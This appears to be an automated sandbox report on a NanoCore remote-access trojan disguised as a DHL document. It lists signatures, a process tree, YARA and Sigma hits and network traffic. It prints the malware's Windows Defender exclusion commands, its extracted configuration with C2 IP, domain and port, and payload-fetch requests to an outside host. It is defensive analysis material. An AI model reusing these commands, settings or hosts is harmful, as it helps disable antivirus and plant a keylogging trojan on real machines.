Loading ...

Play interactive tourEdit tour

Analysis Report DHL_document1102202068090891.exe

Overview

General Information

Sample Name:DHL_document1102202068090891.exe
Analysis ID:358257
MD5:5e86ec60bc329db96be8d476537a554c
SHA1:2881b03bd6a77dc83774e29a93746b52dbb5f568
SHA256:5b60eef7b62c70f68311f80199578144694445d28286c7c87e7f79ace2875580
Tags:CHNDHLexegeoNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
System process connects to network (likely due to code injection or exploit)
Yara detected Nanocore RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Svchost Process
Sigma detected: System File Execution Location Anomaly
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SIDT)
Contains functionality to detect virtual machines (SMSW)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • DHL_document1102202068090891.exe (PID: 5308 cmdline: 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' MD5: 5E86EC60BC329DB96BE8D476537A554C)
    • powershell.exe (PID: 6016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AdvancedRun.exe (PID: 1864 cmdline: 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 6344 cmdline: 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 6624 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6644 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6832 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • CasPol.exe (PID: 2900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • WerFault.exe (PID: 5196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 1000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4616 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4564 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1056 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1036 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 2588 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6384 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6444 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 6560 cmdline: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: 5E86EC60BC329DB96BE8D476537A554C)
  • svchost.exe (PID: 6652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 6840 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • explorer.exe (PID: 6956 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • svchost.exe (PID: 7148 cmdline: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: 5E86EC60BC329DB96BE8D476537A554C)
  • svchost.exe (PID: 7084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5304 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 5044 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "933bebd4-0378-4b22-a9fe-1200446be5", "Group": "", "Domain1": "185.157.160.229", "Domain2": "noancore.linkpc.net", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29980, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xff8d:$x1: NanoCore.ClientPluginHost
    • 0xffca:$x2: IClientNetworkHost
    • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfcf5:$a: NanoCore
      • 0xfd05:$a: NanoCore
      • 0xff39:$a: NanoCore
      • 0xff4d:$a: NanoCore
      • 0xff8d:$a: NanoCore
      • 0xfd54:$b: ClientPlugin
      • 0xff56:$b: ClientPlugin
      • 0xff96:$b: ClientPlugin
      • 0xfe7b:$c: ProjectData
      • 0x10882:$d: DESCrypto
      • 0x1824e:$e: KeepAlive
      • 0x1623c:$g: LogClientMessage
      • 0x12437:$i: get_Connected
      • 0x10bb8:$j: #=q
      • 0x10be8:$j: #=q
      • 0x10c04:$j: #=q
      • 0x10c34:$j: #=q
      • 0x10c50:$j: #=q
      • 0x10c6c:$j: #=q
      • 0x10c9c:$j: #=q
      • 0x10cb8:$j: #=q
      0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        28.2.svchost.exe.4806e98.6.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xe38d:$x1: NanoCore.ClientPluginHost
        • 0xe3ca:$x2: IClientNetworkHost
        • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
        28.2.svchost.exe.4806e98.6.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xe105:$x1: NanoCore Client.exe
        • 0xe38d:$x2: NanoCore.ClientPluginHost
        • 0xf9c6:$s1: PluginCommand
        • 0xf9ba:$s2: FileCommand
        • 0x1086b:$s3: PipeExists
        • 0x16622:$s4: PipeCreated
        • 0xe3b7:$s5: IClientLoggingHost
        28.2.svchost.exe.4806e98.6.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          28.2.svchost.exe.4806e98.6.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
          • 0xe0f5:$a: NanoCore
          • 0xe105:$a: NanoCore
          • 0xe339:$a: NanoCore
          • 0xe34d:$a: NanoCore
          • 0xe38d:$a: NanoCore
          • 0xe154:$b: ClientPlugin
          • 0xe356:$b: ClientPlugin
          • 0xe396:$b: ClientPlugin
          • 0xe27b:$c: ProjectData
          • 0xec82:$d: DESCrypto
          • 0x1664e:$e: KeepAlive
          • 0x1463c:$g: LogClientMessage
          • 0x10837:$i: get_Connected
          • 0xefb8:$j: #=q
          • 0xefe8:$j: #=q
          • 0xf004:$j: #=q
          • 0xf034:$j: #=q
          • 0xf050:$j: #=q
          • 0xf06c:$j: #=q
          • 0xf09c:$j: #=q
          • 0xf0b8:$j: #=q
          0.2.DHL_document1102202068090891.exe.47d29a0.8.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
          • 0xe38d:$x1: NanoCore.ClientPluginHost
          • 0xe3ca:$x2: IClientNetworkHost
          • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
          Click to see the 53 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: NanoCoreShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 2900, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, NewProcessName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, OriginalFileName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6444, ProcessCommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , ProcessId: 6560
          Sigma detected: System File Execution Location AnomalyShow sources
          Source: Process startedAuthor: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, NewProcessName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, OriginalFileName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6444, ProcessCommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , ProcessId: 6560
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, NewProcessName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, OriginalFileName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6444, ProcessCommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , ProcessId: 6560

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "933bebd4-0378-4b22-a9fe-1200446be5", "Group": "", "Domain1": "185.157.160.229", "Domain2": "noancore.linkpc.net", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29980, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted fileShow sources
          Source: DHL_document1102202068090891.exeVirustotal: Detection: 28%Perma Link
          Source: DHL_document1102202068090891.exeReversingLabs: Detection: 32%
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: DHL_document1102202068090891.exeJoe Sandbox ML: detected
          Source: 29.2.CasPol.exe.5ae0000.9.unpackAvira: Label: TR/NanoCore.fadte

          Compliance:

          barindex
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: DHL_document1102202068090891.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
          Source: Binary string: .pdb8 source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
          Source: Binary string: DHL_document1102202068090891.PDBp source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.518675957.00000000012BE000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.518266676.00000000015E7000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000011.00000002.518543220.00000000012B1000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb: source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp
          Source: Binary string: S:AI(RA;IOOICI;;;;WD;("IMAGELOAD",TU,0x0,0x01))\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
          Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
          Source: Binary string: IL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518833808.0000000001610000.00000004.00000020.sdmp
          Source: Binary string: 00240000048000009400000006020000002400005253413C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000011.00000002.519520008.00000000012F3000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb1l source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.517829728.00000000015D9000.00000004.00000020.sdmp
          Source: Binary string: kc.pdbis/P} source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB/ source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb/C:/Windows/System32/cmd.exe source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
          Source: Binary string: 0024000004800000940000000602000000240000525341310004000001000100B5FC90E7027F67871E773A8FDE8938C81DD402Bf:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbC:\Users\user\Documentsr source: svchost.exe, 00000011.00000002.515773658.0000000001255000.00000004.00000001.sdmp
          Source: Binary string: iVisualBasic.pdbt source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
          Source: Binary string: Windows.Foundation.Collections.ValueSet\??\C:\Windows\symbols\dll\mscorlib.pdb source: svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb} source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: noancore.linkpc.net
          Source: Malware configuration extractorURLs: 185.157.160.229
          Source: global trafficTCP traffic: 192.168.2.5:49732 -> 185.157.160.229:6700
          Source: global trafficHTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
          Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
